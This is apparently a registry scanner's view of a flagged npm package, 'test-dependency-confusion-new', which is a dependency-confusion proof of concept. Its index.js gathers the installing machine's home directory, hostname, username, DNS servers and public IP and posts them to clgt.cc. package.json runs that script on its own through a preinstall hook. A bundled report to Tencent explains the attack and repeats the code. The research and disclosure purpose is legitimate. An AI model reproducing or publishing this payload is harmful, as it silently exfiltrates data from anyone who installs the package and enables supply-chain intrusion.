test-dependency-confusion-new 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of test-dependency-confusion-new might be problematic. Click here for more details.
- package/index.js +86 -0
- package/package.json +12 -0
- package/rce +78 -0
package/index.js
ADDED
@@ -0,0 +1,86 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
let have_child_process = true
|
9
|
+
try {
|
10
|
+
const { exec } = require('child_process')
|
11
|
+
} catch(e) {
|
12
|
+
have_child_process = false
|
13
|
+
}
|
14
|
+
|
15
|
+
const sleep = (milliseconds) => {
|
16
|
+
return new Promise(resolve => setTimeout(resolve, milliseconds))
|
17
|
+
}
|
18
|
+
|
19
|
+
function requestPromise(endpoint) {
|
20
|
+
var body = ''
|
21
|
+
|
22
|
+
return new Promise(function(resolve, reject){
|
23
|
+
https.get((endpoint), res => {
|
24
|
+
res.setEncoding('utf8');
|
25
|
+
res.on("data", data => {
|
26
|
+
body += data;
|
27
|
+
});
|
28
|
+
res.on("end", () => {
|
29
|
+
resolve(body)
|
30
|
+
});
|
31
|
+
res.on("error", (e) => {
|
32
|
+
reject(e);
|
33
|
+
});
|
34
|
+
});
|
35
|
+
});
|
36
|
+
|
37
|
+
}
|
38
|
+
|
39
|
+
async function main() {
|
40
|
+
|
41
|
+
const url = 'https://ifconfig.me'
|
42
|
+
const ip = await requestPromise(url)
|
43
|
+
|
44
|
+
const trackingData = JSON.stringify({
|
45
|
+
p: package,
|
46
|
+
c: __dirname,
|
47
|
+
hd: os.homedir(),
|
48
|
+
hn: os.hostname(),
|
49
|
+
un: os.userInfo().username,
|
50
|
+
dns: dns.getServers(),
|
51
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
52
|
+
v: packageJSON.version,
|
53
|
+
pjson: packageJSON,
|
54
|
+
ip: ip,
|
55
|
+
child_process: have_child_process ? 1 : 0,
|
56
|
+
});
|
57
|
+
|
58
|
+
|
59
|
+
var postData = querystring.stringify({
|
60
|
+
msg: trackingData,
|
61
|
+
});
|
62
|
+
|
63
|
+
var options = {
|
64
|
+
hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
|
65
|
+
port: 443,
|
66
|
+
path: "/dependency-conf-npm.php",
|
67
|
+
method: "POST",
|
68
|
+
headers: {
|
69
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
70
|
+
"Content-Length": postData.length,
|
71
|
+
},
|
72
|
+
};
|
73
|
+
|
74
|
+
var req = https.request(options, (res) => {
|
75
|
+
res.on("data", (d) => {
|
76
|
+
process.stdout.write(d);
|
77
|
+
});
|
78
|
+
});
|
79
|
+
|
80
|
+
req.on("error", (e) => {
|
81
|
+
// console.error(e);
|
82
|
+
});
|
83
|
+
|
84
|
+
req.write(postData);
|
85
|
+
req.end();
|
86
|
+
} main()
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "test-dependency-confusion-new",
|
3
|
+
"version": "1.0.3",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
package/rce
ADDED
@@ -0,0 +1,78 @@
|
|
1
|
+
Dear Team,
|
2
|
+
|
3
|
+
I have found a RCE vulnerability on your mirrors.tencent.com server via dependency confusion
|
4
|
+
|
5
|
+
1. Detailed Description :
|
6
|
+
- The vulnerability is very simple, your mirrors.tencent.com server is monitoring all packages on npmjs.com. When you found any new package, you do sync new package to your server and do something including install new package
|
7
|
+
- So If I create a new package for example this case, name: test-dependency-confusion, here is package.json
|
8
|
+
```
|
9
|
+
> cat package.json
|
10
|
+
{
|
11
|
+
"name": "test-dependency-confusion",
|
12
|
+
"version": "1.0.2",
|
13
|
+
"description": "",
|
14
|
+
"main": "index.js",
|
15
|
+
"scripts": {
|
16
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
17
|
+
"preinstall": "node index.js"
|
18
|
+
},
|
19
|
+
"author": "",
|
20
|
+
"license": "ISC"
|
21
|
+
}
|
22
|
+
```
|
23
|
+
You can see in scripts section, preinstall: node index.js
|
24
|
+
I have create index.js, do following:
|
25
|
+
** collection current server information: user, current working directory, os name, ip address (via call http://ifconfig.me)**
|
26
|
+
** Then I send all information to my server https://clgt.cc/**
|
27
|
+
Here is source code
|
28
|
+
```
|
29
|
+
const trackingData = JSON.stringify({
|
30
|
+
p: package,
|
31
|
+
c: __dirname,
|
32
|
+
hd: os.homedir(),
|
33
|
+
hn: os.hostname(),
|
34
|
+
un: os.userInfo().username,
|
35
|
+
dns: dns.getServers(),
|
36
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
37
|
+
v: packageJSON.version,
|
38
|
+
pjson: packageJSON,
|
39
|
+
ip: ip,
|
40
|
+
child_process: have_child_process ? 1 : 0,
|
41
|
+
});
|
42
|
+
|
43
|
+
|
44
|
+
var postData = querystring.stringify({
|
45
|
+
msg: trackingData,
|
46
|
+
});
|
47
|
+
|
48
|
+
var options = {
|
49
|
+
hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
|
50
|
+
port: 443,
|
51
|
+
path: "/dependency-conf-npm.php",
|
52
|
+
method: "POST",
|
53
|
+
headers: {
|
54
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
55
|
+
"Content-Length": postData.length,
|
56
|
+
},
|
57
|
+
};
|
58
|
+
|
59
|
+
var req = https.request(options, (res) => {
|
60
|
+
res.on("data", (d) => {
|
61
|
+
process.stdout.write(d);
|
62
|
+
});
|
63
|
+
});
|
64
|
+
```
|
65
|
+
|
66
|
+
- I do something and push to npmjs repository, I get the link publish https://www.npmjs.com/package/test-dependency-confusion
|
67
|
+
- wait for some minutes, I got signal request to my server with the information, there are some servers from you
|
68
|
+
|
69
|
+
2. Proof :
|
70
|
+
Please do check my attachment images
|
71
|
+
|
72
|
+
3. Impact
|
73
|
+
An attacker can do remote code execution on your server
|
74
|
+
|
75
|
+
3. How to fix :
|
76
|
+
- I think after download/sync package, you should check preinstall script is existed or not. If it exists, do check or remove it
|
77
|
+
|
78
|
+
Thanks and Best Regards,
|